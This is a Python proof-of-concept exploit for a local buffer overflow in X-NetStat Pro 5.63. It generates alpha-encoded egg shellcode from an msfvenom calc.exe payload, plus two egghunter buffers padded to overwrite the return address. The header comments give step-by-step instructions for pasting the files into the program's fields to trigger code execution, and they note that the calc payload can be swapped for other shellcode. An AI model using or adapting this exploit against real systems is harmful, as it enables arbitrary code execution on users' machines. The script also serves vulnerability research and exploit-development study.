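#!/usr/bin/env python
# ---------------------------------------------------------------------------
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter)
# Date: 2019-03-23
# Author: Peyman Forouzan
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit
# Vendor Homepage: https://freshsoftware.com
# Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe
# Version: 5.63
# Special Thanks to my wife
# The program has Local Buffer Overflow in several places.
# Note: Although there are even more simple codes to this vulnerability,
# this technique (EggHunter) has been used to run vulnerability in different windows versions.
# Steps :
# 1- Run python code : X-NetStat.py ( Three files are created )
# 2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL"
#    --> Enter --> Close HTTP Client window.
# 3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt
#    or egghunter-win10.txt (depend on your windows version) into "Run Program" --> Ok
#    --> Wait a little --> Shellcode (Calc) open
# Also Instead of the third stage you can :
# File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt
# or egghunter-win10.txt (depend on your windows version) into "IP List (One IP per Line)" -->
# Then Press Open file (Folder) Icon --> Wait a little --> Shellcode (Calc) open
# ---------------------------------------------------------------------------
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite
# ---------------------------------------------------------------------------
"""Generate the three text files used by the X-NetStat Pro 5.63 PoC.

Running this module writes, into the current directory:

* ``egg.txt``                  - the "w00tw00t"-tagged payload (``egg``)
* ``egghunter-winxp-win7.txt`` - egghunter for XP/Win7, padded to the EIP offset
* ``egghunter-win10.txt``      - egghunter for Win10, padded to the EIP offset

Every byte in the payloads below is printable ASCII (alpha_mixed encoding), so
writing the strings in text mode is encoding-independent and the files can be
pasted into the GUI fields named in the header.
"""

# Number of bytes written before the saved return address is overwritten
# (taken from the original `"\x41" * (264 - len(...))` padding).
EIP_OFFSET = 264


def _write_text(path, content):
    """Write *content* to *path* in text mode.

    The context manager guarantees the handle is closed even when write()
    raises; the original open()/write()/close() sequence leaked it on error.
    """
    with open(path, "w") as handle:
        handle.write(content)


def _pad_to_eip(payload, ret, offset=EIP_OFFSET):
    """Return *payload* padded with 'A' (0x41) up to *offset* bytes, then *ret*.

    Args:
        payload: the egghunter string placed at the start of the overflowed field.
        ret: the bytes that land on the saved return address.
        offset: distance in bytes from the field start to the return address.

    Raises:
        ValueError: if *payload* is already longer than *offset*. The original
            expression silently multiplied by a negative count, producing no
            padding at all and shifting the overwrite without any warning.
    """
    if len(payload) > offset:
        # %-formatting kept for compatibility with the Python 2 era shebang.
        raise ValueError("payload is %d bytes, exceeds EIP offset %d" % (len(payload), offset))
    return payload + "\x41" * (offset - len(payload)) + ret


# -------------------------- EGG Shellcode Generation --------------------------
# msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
# ( Can be replaced with Shellcode )
# "w00tw00t" is the tag the egghunter scans memory for; the rest is the
# alpha_mixed-encoded payload exactly as produced by the command above.
egg = "w00tw00t" + (
    "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
    "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
    "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
    "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
    "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
    "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
    "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
    "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
    "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
    "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
    "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
    "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
    "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
    "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
    "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
    "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
    "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
    "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
    "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
    "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
    "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
    "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
    "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
    "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
    "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
    "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
    "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
    "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
    "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
    "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
    "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
    "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"
)

_write_text("egg.txt", egg)

# ----------------------- EGG Hunter Shellcode Generation -----------------------
# encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters
# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter = (
    "\x4c\x4c\x4c\x4c\x5f"
    "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
    "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
    "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
    "\x47\x75\x4a\x49\x56\x51\x6b\x62\x75\x36\x4e\x6c"
    "\x48\x4b\x6b\x30\x59\x6b\x34\x63\x64\x35\x33\x38"
    "\x45\x61\x49\x4b\x36\x33\x50\x53\x70\x53\x43\x63"
    "\x38\x33\x6f\x30\x43\x56\x4e\x61\x48\x4a\x79\x6f"
    "\x44\x4f\x30\x42\x72\x72\x6b\x30\x59\x6b\x39\x50"
    "\x30\x74\x67\x78\x52\x4a\x77\x72\x50\x58\x48\x4d"
    "\x56\x4e\x71\x4a\x7a\x4b\x35\x42\x70\x6a\x67\x56"
    "\x42\x78\x56\x51\x6b\x79\x6f\x79\x68\x62\x72\x44"
    "\x59\x6f\x67\x63\x62\x7a\x6b\x33\x45\x6c\x57\x54"
    "\x75\x50\x62\x54\x67\x71\x31\x4a\x75\x6c\x67\x75"
    "\x74\x34\x38\x56\x4f\x48\x44\x37\x30\x30\x74\x70"
    "\x31\x64\x6c\x49\x4a\x77\x6e\x4f\x64\x35\x68\x51"
    "\x6c\x6f\x33\x45\x48\x4e\x59\x6f\x6d\x37\x41\x41"
)

# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 = (
    "\x4c\x4c\x4c\x4c\x5f"
    "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
    "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
    "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
    "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
    "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
    "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
    "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
    "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
    "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
    "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
    "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
    "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
    "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
    "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
    "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
    "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
    "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
    "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
    "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
    "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
    "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
    "\x6b\x4f\x68\x67\x41\x41"
)

# Three bytes that land on the saved return address (the original calls this
# a "Direct Eip Overflow"); the value is taken as-is from the original listing.
eip = "\x77\x5a\x46"

# Direct Eip Overflow
buffer = _pad_to_eip(egghunter, eip)
_write_text("egghunter-winxp-win7.txt", buffer)

# Direct Eip Overflow
buffer = _pad_to_eip(egghunter10, eip)
_write_text("egghunter-win10.txt", buffer)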